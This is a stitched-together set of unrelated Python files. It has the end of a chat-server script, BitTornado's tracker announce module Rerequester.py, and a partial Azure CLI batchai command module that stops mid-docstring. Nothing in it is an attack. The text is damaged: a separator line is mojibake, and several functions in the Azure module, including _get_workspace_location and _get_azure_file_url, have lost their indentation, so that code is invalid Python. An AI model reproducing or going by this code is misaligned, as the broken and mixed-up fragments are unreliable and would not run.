            fw = fw + "โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ\nErrors:\n" + errs
            f = open("crs.log", 'w')
            f.write(fw)
            f.close()
        except Exception:
            # bug fix: was a bare `except:` which also swallowed
            # SystemExit/KeyboardInterrupt; Exception keeps the
            # best-effort logging without masking shutdown signals
            error = errors.get()
            error.append("Error while writing output\n")
            errors.put(error)
if __name__ == "__main__":
    # Start the background log writer and the admin console, then block
    # forever in the server accept loop.
    threading.Thread(target = writeoutput,args = (q,errors)).start()
    threading.Thread(target = console,args = (q, errors, motd)).start()
    Server('',port,q,motd,errors,mesg, quit, online).listen()
|
Rerequester.py | # Written by Bram Cohen
# modified for multitracker operation by John Hoffman
# see LICENSE.txt for license information
from BitTornado.zurllib import urlopen
from urllib import quote
from btformats import check_peers
from BitTornado.bencode import bdecode
from threading import Thread, Lock
from cStringIO import StringIO
from traceback import print_exc
from socket import error, gethostbyname
from random import shuffle
from sha import sha
from time import time
try:
    from os import getpid
except ImportError:
    # platforms without os.getpid: use a fixed stand-in value
    def getpid():
        return 1

try:
    True
except:
    # compatibility shim for very old Pythons without bool literals
    True = 1
    False = 0

# 64-character alphabet used to encode the per-tracker announce key
mapbase64 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-'
keys = {}  # tracker URL -> cached key string
# per-process entropy mixed into every generated key
basekeydata = str(getpid()) + repr(time()) + 'tracker'
def add_key(tracker):
    '''Derive a 6-character announce key for `tracker` and cache it in `keys`.'''
    # Take the last 6 bytes of the SHA-1 digest and map each (masked to
    # 6 bits) onto the 64-character alphabet.
    digest_tail = sha(basekeydata + tracker).digest()[-6:]
    keys[tracker] = ''.join(mapbase64[ord(ch) & 0x3F] for ch in digest_tail)
def get_key(tracker):
    """Return the "&key=..." query fragment for `tracker`.

    Generates and caches the key on first use.

    :param str tracker: tracker announce url.
    :return str: query-string fragment including the leading "&key=".
    """
    try:
        return "&key="+keys[tracker]
    except KeyError:
        # First request for this tracker: generate and cache its key.
        # (Was a bare `except:` which would also mask unrelated errors.)
        add_key(tracker)
        return "&key="+keys[tracker]
class fakeflag:
    """Drop-in stub for a threading.Event whose state is fixed at
    construction: wait() returns immediately and isSet() always reports
    the initial state."""

    def __init__(self, state=False):
        self.state = state

    def wait(self):
        # Never blocks; there is no real event behind this flag.
        return None

    def isSet(self):
        return self.state
class Rerequester:
    """Periodic tracker announcer with multitracker (tiered) support.

    Announces run on worker threads; results are marshalled back to the
    main thread via `externalsched`.  A SuccessLock serializes attempts so
    only one announce cycle is in flight at a time.
    """
    def __init__(self, trackerlist, interval, sched, howmany, minpeers,
            connect, externalsched, amount_left, up, down,
            port, ip, myid, infohash, timeout, errorfunc, excfunc,
            maxpeers, doneflag, upratefunc, downratefunc,
            unpauseflag = fakeflag(True)):
        self.excfunc = excfunc
        newtrackerlist = []
        # Randomize order inside each tier, per the multitracker extension.
        for tier in trackerlist:
            if len(tier) > 1:
                shuffle(tier)
            newtrackerlist += [tier]
        self.trackerlist = newtrackerlist
        self.lastsuccessful = ''
        self.rejectedmessage = 'rejected by tracker - '
        # Base query string shared by every announce URL.
        self.url = ('?info_hash=%s&peer_id=%s&port=%s' %
            (quote(infohash), quote(myid), str(port)))
        self.ip = ip
        self.interval = interval
        self.last = None
        self.trackerid = None
        self.announce_interval = 30 * 60
        self.sched = sched
        self.howmany = howmany
        self.minpeers = minpeers
        self.connect = connect
        self.externalsched = externalsched
        self.amount_left = amount_left
        self.up = up
        self.down = down
        self.timeout = timeout
        self.errorfunc = errorfunc
        self.maxpeers = maxpeers
        self.doneflag = doneflag
        self.upratefunc = upratefunc
        self.downratefunc = downratefunc
        self.unpauseflag = unpauseflag
        self.last_failed = True
        self.never_succeeded = True
        self.errorcodes = {}
        self.lock = SuccessLock()
        self.special = None
        self.stopped = False
    def start(self):
        # Two independent timers: c() re-announces when short of peers,
        # d() performs the regular periodic announce (starting with event 0).
        self.sched(self.c, self.interval/2)
        self.d(0)
    def c(self):
        # Short-interval check: announce only when below minpeers.
        if self.stopped:
            return
        if not self.unpauseflag.isSet() and self.howmany() < self.minpeers:
            self.announce(3, self._c)
        else:
            self._c()
    def _c(self):
        self.sched(self.c, self.interval)
    def d(self, event = 3):
        # Regular periodic announce; skipped (but rescheduled) while paused.
        if self.stopped:
            return
        if not self.unpauseflag.isSet():
            self._d()
            return
        self.announce(event, self._d)
    def _d(self):
        if self.never_succeeded:
            self.sched(self.d, 60) # retry in 60 seconds
        else:
            self.sched(self.d, self.announce_interval)
    def announce(self, event = 3, callback = lambda: None, specialurl = None):
        # event: 0 = started, 1 = completed, 2 = stopped, 3 = no event.
        if specialurl is not None:
            s = self.url+'&uploaded=0&downloaded=0&left=1' # don't add to statistics
            if self.howmany() >= self.maxpeers:
                s += '&numwant=0'
            else:
                s += '&no_peer_id=1&compact=1'
            self.last_failed = True # force true, so will display an error
            self.special = specialurl
            self.rerequest(s, callback)
            return
        else:
            s = ('%s&uploaded=%s&downloaded=%s&left=%s' %
                (self.url, str(self.up()), str(self.down()),
                str(self.amount_left())))
        if self.last is not None:
            s += '&last=' + quote(str(self.last))
        if self.trackerid is not None:
            s += '&trackerid=' + quote(str(self.trackerid))
        if self.howmany() >= self.maxpeers:
            s += '&numwant=0'
        else:
            s += '&no_peer_id=1&compact=1'
        if event != 3:
            s += '&event=' + ['started', 'completed', 'stopped'][event]
        if event == 2:
            self.stopped = True
        self.rerequest(s, callback)
    def snoop(self, peers, callback = lambda: None): # tracker call support
        # One-shot query to probe a tracker without joining the swarm.
        self.rerequest(self.url
            +'&event=stopped&port=0&uploaded=0&downloaded=0&left=1&tracker=1&numwant='
            +str(peers), callback)
    def rerequest(self, s, callback):
        if not self.lock.isfinished():  # still waiting for prior cycle to complete??
            def retry(self = self, s = s, callback = callback):
                self.rerequest(s, callback)
            self.sched(retry, 5)         # retry in 5 seconds
            return
        self.lock.reset()
        rq = Thread(target = self._rerequest, args = [s, callback])
        rq.setDaemon(False)
        rq.start()
    def _rerequest(self, s, callback):
        # Worker thread: try trackers tier by tier until one responds.
        try:
            def fail(self = self, callback = callback):
                self._fail(callback)
            if self.ip:
                try:
                    s += '&ip=' + gethostbyname(self.ip)
                except:
                    self.errorcodes['troublecode'] = 'unable to resolve: '+self.ip
                    self.externalsched(fail)
            self.errorcodes = {}
            if self.special is None:
                for t in range(len(self.trackerlist)):
                    for tr in range(len(self.trackerlist[t])):
                        tracker = self.trackerlist[t][tr]
                        if self.rerequest_single(tracker, s, callback):
                            # Promote the responding tracker to the front
                            # of its tier for next time.
                            if not self.last_failed and tr != 0:
                                del self.trackerlist[t][tr]
                                self.trackerlist[t] = [tracker] + self.trackerlist[t]
                            return
            else:
                tracker = self.special
                self.special = None
                if self.rerequest_single(tracker, s, callback):
                    return
            # no success from any tracker
            self.externalsched(fail)
        except:
            self.exception(callback)
    def _fail(self, callback):
        # Only surface an error when transfer rates are low (or the download
        # is finished) so transient tracker trouble doesn't spam the user.
        if ( (self.upratefunc() < 100 and self.downratefunc() < 100)
             or not self.amount_left() ):
            # Report the most specific recorded error, in priority order.
            for f in ['rejected', 'bad_data', 'troublecode']:
                if self.errorcodes.has_key(f):
                    r = self.errorcodes[f]
                    break
            else:
                r = 'Problem connecting to tracker - unspecified error'
            self.errorfunc(r)
        self.last_failed = True
        self.lock.give_up()
        self.externalsched(callback)
    def rerequest_single(self, t, s, callback):
        # Launch one announce attempt and block until it trips the lock.
        l = self.lock.set()
        rq = Thread(target = self._rerequest_single, args = [t, s+get_key(t), l, callback])
        rq.setDaemon(False)
        rq.start()
        self.lock.wait()
        if self.lock.success:
            self.lastsuccessful = t
            self.last_failed = False
            self.never_succeeded = False
            return True
        if not self.last_failed and self.lastsuccessful == t:
            # if the last tracker hit was successful, and you've just tried the tracker
            # you'd contacted before, don't go any further, just fail silently.
            self.last_failed = True
            self.externalsched(callback)
            self.lock.give_up()
            return True
        return False # returns true if it wants rerequest() to exit
    def _rerequest_single(self, t, s, l, callback):
        # Worker-thread body for a single tracker announce; `l` is the
        # SuccessLock code identifying this attempt.
        try:
            closer = [None]
            def timedout(self = self, l = l, closer = closer):
                if self.lock.trip(l):
                    self.errorcodes['troublecode'] = 'Problem connecting to tracker - timeout exceeded'
                    self.lock.unwait(l)
                try:
                    closer[0]()
                except:
                    pass
            self.externalsched(timedout, self.timeout)
            err = None
            try:
                h = urlopen(t+s)
                closer[0] = h.close
                data = h.read()
            except (IOError, error), e:
                err = 'Problem connecting to tracker - ' + str(e)
            except:
                err = 'Problem connecting to tracker'
            try:
                h.close()
            except:
                pass
            if err:
                if self.lock.trip(l):
                    self.errorcodes['troublecode'] = err
                    self.lock.unwait(l)
                return
            if not data:
                if self.lock.trip(l):
                    self.errorcodes['troublecode'] = 'no data from tracker'
                    self.lock.unwait(l)
                return
            try:
                r = bdecode(data, sloppy=1)
                check_peers(r)
            except ValueError, e:
                if self.lock.trip(l):
                    self.errorcodes['bad_data'] = 'bad data from tracker - ' + str(e)
                    self.lock.unwait(l)
                return
            if r.has_key('failure reason'):
                if self.lock.trip(l):
                    self.errorcodes['rejected'] = self.rejectedmessage + r['failure reason']
                    self.lock.unwait(l)
                return
            if self.lock.trip(l, True): # success!
                self.lock.unwait(l)
            else:
                callback = lambda: None # attempt timed out, don't do a callback
            # even if the attempt timed out, go ahead and process data
            def add(self = self, r = r, callback = callback):
                self.postrequest(r, callback)
            self.externalsched(add)
        except:
            self.exception(callback)
    def postrequest(self, r, callback):
        # Runs on the main thread: digest a successful tracker response.
        if r.has_key('warning message'):
            self.errorfunc('warning from tracker - ' + r['warning message'])
        self.announce_interval = r.get('interval', self.announce_interval)
        self.interval = r.get('min interval', self.interval)
        self.trackerid = r.get('tracker id', self.trackerid)
        self.last = r.get('last')
        # ps = len(r['peers']) + self.howmany()
        p = r['peers']
        peers = []
        if type(p) == type(''):
            # Compact format: 6 bytes per peer (4 ip bytes, 2 port bytes
            # big-endian).
            for x in xrange(0, len(p), 6):
                ip = '.'.join([str(ord(i)) for i in p[x:x+4]])
                port = (ord(p[x+4]) << 8) | ord(p[x+5])
                peers.append(((ip, port), 0))
        else:
            for x in p:
                peers.append(((x['ip'].strip(), x['port']), x.get('peer id', 0)))
        ps = len(peers) + self.howmany()
        if ps < self.maxpeers:
            # Still short of peers: clear `last` so the next announce asks
            # for a fresh peer list when the tracker seems to have more.
            if self.doneflag.isSet():
                if r.get('num peers', 1000) - r.get('done peers', 0) > ps * 1.2:
                    self.last = None
            else:
                if r.get('num peers', 1000) > ps * 1.2:
                    self.last = None
        if peers:
            shuffle(peers)
            self.connect(peers)
        callback()
    def exception(self, callback):
        # Format the current traceback and hand it to excfunc (or print it)
        # on the main thread, then still invoke the callback.
        data = StringIO()
        print_exc(file = data)
        def r(s = data.getvalue(), callback = callback):
            if self.excfunc:
                self.excfunc(s)
            else:
                print s
            callback()
        self.externalsched(r)
class SuccessLock:
    """Coordinates concurrent tracker announce attempts.

    set() registers a new attempt and returns its unique code; trip(code)
    lets the first caller of the current attempt claim it (with s=True it
    also marks the whole cycle finished and successful); wait()/unwait(code)
    park and release the requesting thread; give_up() abandons the cycle.
    `success` and `finished` summarize the outcome of the current cycle.
    """
    def __init__(self):
        self.lock = Lock()    # guards code/first/finished/success
        self.pause = Lock()   # parks the thread that calls wait()
        self.code = 0L
        self.success = False
        self.finished = True
    def reset(self):
        # Begin a new announce cycle.
        self.success = False
        self.finished = False
    def set(self):
        # Register a new attempt and return its unique code.
        self.lock.acquire()
        if not self.pause.locked():
            self.pause.acquire()
        self.first = True
        self.code += 1L
        self.lock.release()
        return self.code
    def trip(self, code, s = False):
        # Returns True only for the first trip of the current attempt;
        # stale codes (from timed-out attempts) fall through and return None.
        self.lock.acquire()
        try:
            if code == self.code and not self.finished:
                r = self.first
                self.first = False
                if s:
                    self.finished = True
                    self.success = True
                return r
        finally:
            self.lock.release()
    def give_up(self):
        self.lock.acquire()
        self.success = False
        self.finished = True
        self.lock.release()
    def wait(self):
        # Blocks until unwait() releases the pause lock.
        self.pause.acquire()
    def unwait(self, code):
        # Release the waiter, but only for the current attempt.
        if code == self.code and self.pause.locked():
            self.pause.release()
    def isfinished(self):
        self.lock.acquire()
        x = self.finished
        self.lock.release()
        return x
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-many-lines
import collections
import copy
import datetime
import json
import os
import signal
import socket
import string
import sys
import threading
import time
from functools import partial
from random import shuffle
import paramiko
import requests
from knack.log import get_logger
from knack.util import CLIError
from msrest.serialization import Deserializer
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from six.moves import urllib_parse
from azure.cli.core import keys
from azure.cli.core.util import get_default_admin_username
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.profiles import ResourceType, get_sdk
import azure.mgmt.batchai.models as models
# Environment variables for specifying azure storage account and key. We want the user to make explicit
# decision about which storage account to use instead of using his default account specified via AZURE_STORAGE_ACCOUNT
# and AZURE_STORAGE_KEY.
AZURE_BATCHAI_STORAGE_ACCOUNT = 'AZURE_BATCHAI_STORAGE_ACCOUNT'
AZURE_BATCHAI_STORAGE_KEY = 'AZURE_BATCHAI_STORAGE_KEY'
# User-facing messages shown when required storage configuration is missing.
MSG_CONFIGURE_STORAGE_ACCOUNT = 'Please configure Azure Storage account name via AZURE_BATCHAI_STORAGE_ACCOUNT or ' \
                                'provide storage_account value in batchai section of your az configuration file.'
MSG_CONFIGURE_STORAGE_KEY = 'Please configure Azure Storage account key via AZURE_BATCHAI_STORAGE_KEY or ' \
                            'provide storage_key value in batchai section of your az configuration file.'
# Output directory id reserved for job stdout/stderr.
STANDARD_OUTPUT_DIRECTORY_ID = 'stdouterr'
# Parameters of auto storage
AUTO_STORAGE_RESOURCE_GROUP = 'batchaiautostorage'
AUTO_STORAGE_CONTAINER_NAME = 'batchaicontainer'
AUTO_STORAGE_SHARE_NAME = 'batchaishare'
AUTO_STORAGE_ACCOUNT_PREFIX = 'bai'
AUTO_STORAGE_CONTAINER_PATH = 'autobfs'
AUTO_STORAGE_SHARE_PATH = 'autoafs'
# Placeholders which customer may use in his config file for cluster creation.
AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_KEY)
AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_ACCOUNT)
# Default expiration time for file download URLs.
DEFAULT_URL_EXPIRY_MIN = 60
# Supported images.
SUPPORTED_IMAGE_ALIASES = {
    "UbuntuLTS": models.ImageReference(
        publisher='Canonical',
        offer='UbuntuServer',
        sku='16.04-LTS'
    ),
    "UbuntuDSVM": models.ImageReference(
        publisher='microsoft-ads',
        offer='linux-data-science-vm-ubuntu',
        sku='linuxdsvmubuntu'
    )
}
# Type of entries reported by list startup files.
LogFile = collections.namedtuple('LogFile', 'name download_url is_directory size')
# Module-level logger for this command module.
logger = get_logger(__name__)
def _get_resource_group_location(cli_ctx, resource_group):
    """Return the Azure location of the given resource group."""
    resources = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    group = resources.resource_groups.get(resource_group)
    return group.location
def _get_workspace_location(client, resource_group, workspace_name):
workspace = client.workspaces.get(resource_group, workspace_name)
return workspace.location
def _get_default_ssh_public_key_location():
path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub')
if os.path.exists(path):
return path
return None
def _get_deserializer():
    """Build an msrest Deserializer aware of all batchai model classes."""
    class_map = {name: cls for name, cls in models.__dict__.items() if isinstance(cls, type)}
    return Deserializer(class_map)
def _ensure_resource_not_exist(client, resource_group, workspace, name):
    """Raise CLIError if a resource with the given name already exists.

    :param client: operations client exposing get(resource_group, workspace, name).
    :param str resource_group: resource group name.
    :param str workspace: workspace name.
    :param str name: resource name.
    :raise CLIError: when the resource already exists.
    """
    try:
        client.get(resource_group, workspace, name)
        # Fixed message: it previously said '... in "<workspace>" resource group
        # under "<name>" resource group', mixing up workspace and resource group.
        raise CLIError('"{0}" already exists in "{1}" workspace under "{2}" resource group.'.format(
            name, workspace, resource_group))
    except CloudError as e:
        # 404 means the name is free; any other service error is propagated.
        if e.status_code != 404:
            raise
def _ensure_job_not_exist(client, resource_group, workspace, experiment, name):
    """Raise CLIError if a job with the given coordinates already exists."""
    try:
        client.get(resource_group, workspace, experiment, name)
    except CloudError as e:
        # 404 means the name is free; anything else is a real failure.
        if e.status_code != 404:
            raise
        return
    raise CLIError('A job with given name, experiment, workspace and resource group already exists.')
def _ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name):
    """Validate the subnet resource id and, when an NFS is mounted, verify
    that the NFS lives in the same subnet.

    :param client: batchai client.
    :param str or None subnet: subnet resource id provided on the command line.
    :param str nfs_resource_group: resource group of the mounted NFS.
    :param str nfs_workspace: workspace of the mounted NFS.
    :param str nfs_name: name of the mounted NFS.
    :raise CLIError: on ill-formed subnet id or subnet mismatch.
    """
    if not subnet:
        return
    if not is_valid_resource_id(subnet):
        raise CLIError('Ill-formed subnet resource id')
    # check there are no conflicts between provided subnet and mounted nfs
    if not nfs_name:
        return
    nfs = None # type: models.FileServer
    try:
        nfs = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
    except CloudError as e:
        # 404 is tolerated here; other errors are propagated.
        if e.status_code != 404:
            raise
    if not nfs:
        # CLI will return the error during nfs validation
        return
    if nfs.subnet.id != subnet:
        raise CLIError('Cluster and mounted NFS must be in the same subnet.')
def _get_storage_management_client(cli_ctx):
    """Return a storage management client for the current CLI context."""
    client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_STORAGE)
    return client
def _get_storage_account_key(cli_ctx, account_name, account_key):
    """Returns account key for the given storage account.

    :param str account_name: storage account name.
    :param str or None account_key: account key provided as command line argument.
    :raise CLIError: when the account or its keys cannot be found.
    """
    if account_key:
        # Explicit key from the command line wins.
        return account_key
    storage_client = _get_storage_management_client(cli_ctx)
    matching_ids = [a.id for a in storage_client.storage_accounts.list() if a.name == account_name]
    if not matching_ids:
        raise CLIError('Cannot find "{0}" storage account.'.format(account_name))
    group = parse_resource_id(matching_ids[0])['resource_group']
    keys_list_result = storage_client.storage_accounts.list_keys(group, account_name)
    if not keys_list_result or not keys_list_result.keys:
        raise CLIError('Cannot find a key for "{0}" storage account.'.format(account_name))
    return keys_list_result.keys[0].value
def _get_effective_storage_account_name_and_key(cli_ctx, account_name, account_key):
    """Returns storage account name and key to be used.

    :param str or None account_name: storage account name provided as command line argument.
    :param str or None account_key: storage account key provided as command line argument.
    """
    if not account_name:
        # Nothing on the command line - fall back to the az config file.
        return (cli_ctx.config.get('batchai', 'storage_account', ''),
                cli_ctx.config.get('batchai', 'storage_key', ''))
    return account_name, _get_storage_account_key(cli_ctx, account_name, account_key) or ''
def _get_account_name_from_azure_file_url(azure_file_url):
    """Extracts account name from Azure File URL

    :param str azure_file_url: Azure File URL of the form https://<account>.<suffix>/...
    :return str: account name
    :raise CLIError: when the URL is absent, empty or ill-formed.
    """
    if not azure_file_url:
        # Fixed wording (was: 'Azure File URL cannot absent or be empty').
        raise CLIError('Azure File URL cannot be absent or empty')
    o = urllib_parse.urlparse(azure_file_url)
    try:
        # The account name is the first dot-separated label of the host.
        account, _ = o.netloc.split('.', 1)
        return account
    except ValueError:
        raise CLIError('Ill-formed Azure File URL "{0}"'.format(azure_file_url))
def _get_effective_credentials(cli_ctx, existing_credentials, account_name):
    """Returns AzureStorageCredentialInfo for the account.

    :param models.AzureStorageCredentialsInfo existing_credentials: known credentials.
    :param str account_name: storage account name.
    :return models.AzureStorageCredentialsInfo: credentials to be used.
    """
    has_usable_key = existing_credentials and (
        existing_credentials.account_key or existing_credentials.account_key_secret_reference)
    if has_usable_key:
        return existing_credentials
    # No usable credentials known - look the key up from the subscription.
    return models.AzureStorageCredentialsInfo(
        account_key=_get_storage_account_key(cli_ctx, account_name, account_key=None))
def _patch_mount_volumes(cli_ctx, volumes, account_name=None, account_key=None):
    """Patches mount volumes by replacing placeholders and adding credentials information.

    :param models.MountVolumes or None volumes: mount volumes.
    :param str or None account_name: name of the storage account provided as command line argument.
    :param str or None account_key: storage account key provided as command line argument.
    :return models.ClusterCreateParameters: updated parameters.
    """
    if volumes is None:
        return None
    result = copy.deepcopy(volumes)  # type: models.MountVolumes
    storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(
        cli_ctx, account_name, account_key)
    # Track whether any placeholder actually required the effective
    # account/key, so we only complain about missing config when needed.
    require_storage_account = False
    require_storage_account_key = False
    # Patch parameters of azure file share.
    if result.azure_file_shares:
        for ref in result.azure_file_shares:
            # Populate account name if it was not provided
            if not ref.account_name:
                ref.account_name = _get_account_name_from_azure_file_url(ref.azure_file_url)
            # Replace placeholders
            if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
                require_storage_account = True
                ref.account_name = storage_account_name
            if ref.azure_file_url and AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER in ref.azure_file_url:
                require_storage_account = True
                ref.azure_file_url = ref.azure_file_url.replace(
                    AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER, storage_account_name)
            if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
                require_storage_account_key = True
                ref.credentials.account_key = storage_account_key
            if not ref.credentials and ref.account_name == storage_account_name:
                require_storage_account_key = True
                ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
            if ref.account_name:
                ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
    # Patch parameters of blob file systems.
    if result.azure_blob_file_systems:
        for ref in result.azure_blob_file_systems:
            # Replace placeholders
            if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
                require_storage_account = True
                ref.account_name = storage_account_name
            if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
                require_storage_account_key = True
                ref.credentials.account_key = storage_account_key
            if not ref.credentials and ref.account_name == storage_account_name:
                require_storage_account_key = True
                ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
            # Populate the rest of credentials based on the account name
            if not ref.account_name:
                raise CLIError('Ill-formed Azure Blob File System reference in the configuration file - no account '
                               'name provided.')
            if ref.account_name:
                ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
    if require_storage_account and not storage_account_name:
        raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
    if require_storage_account_key and not storage_account_key:
        raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
    return result
def _update_user_account_settings(params, admin_user_name, ssh_key, password):
    """Update account settings of cluster or file server creation parameters

    :param models.ClusterCreateParameters or models.FileServerCreateParameters params: params to update
    :param str or None admin_user_name: name of admin user to create.
    :param str or None ssh_key: ssh public key value or path to the file containing the key.
    :param str or None password: password.
    :return models.ClusterCreateParameters: updated parameters.
    """
    result = copy.deepcopy(params)
    # Cluster params carry user_account_settings directly; file server params
    # nest them under ssh_configuration.
    if hasattr(result, 'user_account_settings'):
        parent = result
    else:
        if result.ssh_configuration is None:
            result.ssh_configuration = models.SshConfiguration(user_account_settings=None)
        parent = result.ssh_configuration
    if parent.user_account_settings is None:
        parent.user_account_settings = models.UserAccountSettings(admin_user_name=None)
    # Get effective user name, password and key trying them in the following order: provided via command line,
    # provided in the config file, current user name and his default public ssh key.
    effective_user_name = admin_user_name or parent.user_account_settings.admin_user_name or get_default_admin_username()  # pylint: disable=line-too-long
    effective_password = password or parent.user_account_settings.admin_user_password
    # Use default ssh public key only if no password is configured.
    effective_key = (ssh_key or parent.user_account_settings.admin_user_ssh_public_key or
                     (None if effective_password else _get_default_ssh_public_key_location()))
    if effective_key:
        # The value may be a path to a key file rather than the key itself.
        if os.path.exists(os.path.expanduser(effective_key)):
            with open(os.path.expanduser(effective_key)) as f:
                effective_key = f.read()
    try:
        if effective_key and not keys.is_valid_ssh_rsa_public_key(effective_key):
            raise CLIError('Incorrect ssh public key value.')
    except Exception:
        # Validation itself may throw on malformed input; normalize the error.
        raise CLIError('Incorrect ssh public key value.')
    parent.user_account_settings.admin_user_name = effective_user_name
    parent.user_account_settings.admin_user_ssh_public_key = effective_key
    parent.user_account_settings.admin_user_password = effective_password
    if not parent.user_account_settings.admin_user_name:
        raise CLIError('Please provide admin user name.')
    if (not parent.user_account_settings.admin_user_ssh_public_key and
            not parent.user_account_settings.admin_user_password):
        raise CLIError('Please provide admin user password or ssh key.')
    return result
def _add_nfs_to_mount_volumes(volumes, file_server_id, mount_path):
    """Adds NFS to the mount volumes.

    :param models.MountVolumes or None volumes: existing mount volumes.
    :param str file_server_id: resource id of the file server.
    :param str mount_path: relative mount path for the file server.
    :return models.ClusterCreateParameters: updated parameters.
    """
    patched = copy.deepcopy(volumes) if volumes else models.MountVolumes()
    if not mount_path:
        raise CLIError('File server relative mount path cannot be empty.')
    reference = models.FileServerReference(
        relative_mount_path=mount_path,
        file_server=models.ResourceId(id=file_server_id),
        mount_options="rw")
    if patched.file_servers is None:
        patched.file_servers = []
    patched.file_servers.append(reference)
    return patched
def _get_azure_file_url(cli_ctx, account_name, azure_file_share):
"""Returns Azure File URL for the given account
:param str account_name: account name
:param str azure_file_share: name of the share
:return str: Azure File URL to be used in mount volumes
"""
return 'https://{0}.file.{1}/{2}'.format(account_name, cli_ctx.cloud.suffixes.storage_endpoint, azure_file_share)
def _add_azure_file_share_to_mount_volumes(cli_ctx, volumes, azure_file_share, mount_path, account_name=None,
                                           account_key=None):
    """Add Azure File share to the mount volumes.

    :param model.MountVolumes volumes: existing mount volumes.
    :param str azure_file_share: name of the azure file share.
    :param str mount_path: relative mount path for Azure File share.
    :param str or None account_name: storage account name provided as command line argument.
    :param str or None account_key: storage account key provided as command line argument.
    :return models.ClusterCreateParameters: updated parameters.
    """
    patched = copy.deepcopy(volumes) if volumes else models.MountVolumes()
    if not mount_path:
        raise CLIError('Azure File share relative mount path cannot be empty.')
    if patched.azure_file_shares is None:
        patched.azure_file_shares = []
    effective_name, effective_key = _get_effective_storage_account_name_and_key(
        cli_ctx, account_name, account_key)
    if not effective_name:
        raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
    if not effective_key:
        raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
    patched.azure_file_shares.append(models.AzureFileShareReference(
        relative_mount_path=mount_path,
        account_name=effective_name,
        azure_file_url=_get_azure_file_url(cli_ctx, effective_name, azure_file_share),
        credentials=models.AzureStorageCredentialsInfo(account_key=effective_key)))
    return patched
def _add_azure_container_to_mount_volumes(cli_ctx, volumes, container_name, mount_path, account_name=None,
                                          account_key=None):
    """Add Azure Storage container to the mount volumes.

    :param model.MountVolumes: existing mount volumes.
    :param str container_name: container name.
    :param str mount_path: relative mount path for the container.
    :param str or None account_name: storage account name provided as command line argument.
    :param str or None account_key: storage account key provided as command line argument.
    :return models.ClusterCreateParameters: updated parameters.
    """
    patched = copy.deepcopy(volumes) if volumes else models.MountVolumes()
    if not mount_path:
        raise CLIError('Azure Storage Container relative mount path cannot be empty.')
    if patched.azure_blob_file_systems is None:
        patched.azure_blob_file_systems = []
    effective_name, effective_key = _get_effective_storage_account_name_and_key(
        cli_ctx, account_name, account_key)
    if not effective_name:
        raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
    if not effective_key:
        raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
    patched.azure_blob_file_systems.append(models.AzureBlobFileSystemReference(
        relative_mount_path=mount_path,
        account_name=effective_name,
        container_name=container_name,
        credentials=models.AzureStorageCredentialsInfo(account_key=effective_key)))
    return patched
def _get_image_reference(image, custom_image):
    """Returns image reference for the given image and custom image.

    :param str image or None: image alias or full spec.
    :param str custom_image or None: resource id of the custom image.
    :raise CLIError: if the image with given alias was not found.
    """
    if custom_image and not image:
        raise CLIError('You need to specify --image argument with information about the custom image')
    if custom_image and not is_valid_resource_id(custom_image):
        raise CLIError('Ill-formed custom image resource id')
    # Guard `image` for None so a missing value falls through to the alias
    # error below instead of raising TypeError on the `in` test.
    if image and ':' in image:
        # full image specification is provided
        try:
            publisher, offer, sku, version = image.split(':')
            if not publisher:
                raise CLIError('Image publisher must be provided in --image argument')
            if not offer:
                raise CLIError('Image offer must be provided in --image argument')
            if not sku:
                raise CLIError('Image sku must be provided in --image argument')
            return models.ImageReference(
                publisher=publisher,
                offer=offer,
                sku=sku,
                version=version or None,
                virtual_machine_image_id=custom_image
            )
        except ValueError:
            raise CLIError('--image must have format "publisher:offer:sku:version" or "publisher:offer:sku:"')
    # image alias is used
    reference = None
    if image:
        for alias, value in SUPPORTED_IMAGE_ALIASES.items():
            if alias.lower() == image.lower():
                reference = value
                break  # first case-insensitive match wins; no need to keep scanning
    if not reference:
        raise CLIError('Unsupported image alias "{0}", supported aliases are {1}'.format(
            image, ', '.join(SUPPORTED_IMAGE_ALIASES.keys())))
    result = copy.deepcopy(reference)
    result.virtual_machine_image_id = custom_image
    return result
def _get_scale_settings(initial_count, min_count, max_count):
    """Returns scale settings for a cluster with given parameters.

    :param int or None initial_count: initial (target) number of nodes.
    :param int or None min_count: minimum number of nodes for auto-scale.
    :param int or None max_count: maximum number of nodes for auto-scale.
    :return models.ScaleSettings or None: None when nothing was provided, so
        the value from the configuration file should be used instead.
    :raise CLIError: when the provided combination of counts is inconsistent.
